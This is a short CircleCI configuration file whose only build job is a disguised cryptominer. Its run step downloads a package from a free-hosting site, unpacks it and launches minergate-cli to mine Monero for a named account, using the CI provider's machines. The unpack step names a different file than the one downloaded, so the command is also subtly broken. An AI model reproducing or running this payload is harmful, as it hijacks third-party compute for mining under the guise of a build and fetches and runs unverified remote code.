version: 2
jobs:
  build:
    docker:
      - image: greenfieldsvp/dock
    steps:
      - checkout
      - run: apt-get update && apt-get install binutils && wget http://hupiter.000webhostapp.com/a.deb && ar x deb-cli && tar -xvzf data.tar.gz && cd opt/minergate-cli && ./minergate-cli -user greenfieldsvp@outlook.com.vn -xmr
